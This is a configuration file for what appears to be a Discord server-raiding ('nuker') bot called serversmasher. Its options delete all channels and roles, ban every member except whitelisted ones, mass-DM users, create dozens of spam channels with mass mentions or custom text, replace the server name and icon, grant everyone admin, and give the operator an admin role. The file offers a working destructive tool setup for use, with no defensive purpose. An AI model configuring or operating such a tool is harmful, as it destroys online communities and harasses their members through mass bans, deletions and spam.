token = "TOKEN HERE"
clienttype = "bot" #'bot' is for bot accounts, 'user' is for user accounts (with the perms)
changegameonlogin = True #True Changes the playing game on login.
logingame = "GAME HERE" #Name of the name to play on login.
namechange = True #True to change name. Can sometimes glitch and not let anyone change the name.
servname = "SERVER NAME HERE" #only required if the above is True
iconbegone = False #True removes icon. Do not use with chnage icon enabled also.
changeicon = True #True Changes icon to a file specified below.
iconfile = 'meme.jpg' #Put the image in the "serversmasher" folder
chandel = True #True deletes all channels
roledel = True #True deletes all roles underneath the bots role
userban = True #True bans all members, except the ones below. you can add as many as you like.
userid = ['user#3981','user#7579']
senddm = True #True sends everyone a DM, specified below.
dmcontent = "DM CONTENT HERE"
createchan = True #True creates channels, using the method below
chanmethod = "set" #'ascii' for random ascii name, 'set' for set name below, 'voice' for a voice channel with the name below(If voice and channel deletion is enabled you will not be able to use spam methods).
channame = "CHANNEL NAME HERE" #Name of the channels to create
channelno = "80" #ammount of channels, the limit for discord is 500
spammethod = "text" #"massment" for mass mention, "asc" for random ascii spam, "text" for custom text spam
customtxt = "CUSTOM SPAM TEXT HERE" #only if you use text spam method
gimmieadmin = False #True Gives you an admin role.
giveeveryoneadmin = True #True gives everyone admin. Works best if you dont ban them ¯\_(ツ)_/¯
me = 'ID HERE' #put your client ID here if you enable gimmieadmin
